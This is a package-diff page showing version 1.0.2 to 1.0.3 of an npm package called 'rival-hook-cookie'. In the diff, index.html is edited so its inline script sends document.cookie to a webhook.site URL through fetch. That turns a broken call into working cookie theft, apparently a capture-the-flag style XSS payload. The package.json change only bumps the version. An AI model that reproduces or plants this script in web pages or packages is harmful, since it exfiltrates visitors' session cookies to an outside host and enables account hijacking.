RubyGems
npm
Organizations
Log in
Sign up
npm
rival-hook-cookie
Versions diffs
1.0.2 → 1.0.3
rival-hook-cookie 1.0.2 → 1.0.3
Sign up to get
free
protection for your applications and to get access to all the features.
Files changed (2)
hide
show
package/index.html
+1
-1
package/package.json
+1
-1
package/index.html
CHANGED
Viewed
@@ -1,3 +1,3 @@
1
1
<script>
2
-
fetch("https://webhook.site/993897bc-3909-454f-a480-6c71fb276daf/?flag=document.cookie
"
);
2
+
fetch("https://webhook.site/993897bc-3909-454f-a480-6c71fb276daf/?flag=
" +
document.cookie);
3
3
</script>
package/package.json
CHANGED
Viewed
@@ -1,6 +1,6 @@
1
1
{
2
2
"name": "rival-hook-cookie",
3
-
"version": "1.0.
2
",
3
+
"version": "1.0.
3
",
4
4
"description": "",
5
5
"main": "index.js",
6
6
"scripts": {